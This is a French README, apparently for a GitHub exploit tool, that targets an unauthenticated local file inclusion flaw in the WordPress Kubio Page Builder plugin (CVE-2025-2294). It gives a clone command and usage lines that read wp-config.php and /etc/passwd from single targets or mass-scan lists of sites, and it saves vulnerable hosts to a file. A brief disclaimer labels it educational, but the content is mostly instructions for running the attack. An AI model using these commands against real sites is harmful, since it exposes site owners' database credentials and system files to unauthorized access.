
Exploit d'inclusion locale de fichier (LFI) non authentifié pour le plugin WordPress Kubio Page Builder (CVE-2025-2294). Prend en charge le ciblage unique, l'analyse en masse, la détection de version et la lecture de chemin de fichier personnalisé.
Exploit Local File Inclusion (LFI) pour le plugin WordPress Kubio Page Builder (versions ≤ 2.5.1).
Cet outil exploite une vulnérabilité LFI non authentifiée dans le plugin Kubio Page Builder (CVE-2025-2294), permettant aux attaquants de lire des fichiers sensibles sur des installations WordPress vulnérables.
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
| Option | Description |
|---|---|
-u, --url | URL d'une seule cible |
-l, --list | Fichier contenant une liste de cibles |
-f, --file | Fichier à lire (par défaut : /etc/passwd) |
-o, --output | Sauvegarder les cibles vulnérables dans un fichier |
targets.txt :
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
Cet outil est uniquement destiné à des fins éducatives. Le développeur n'est pas responsable d'une mauvaise utilisation. Obtenez toujours une autorisation appropriée avant de tester un système.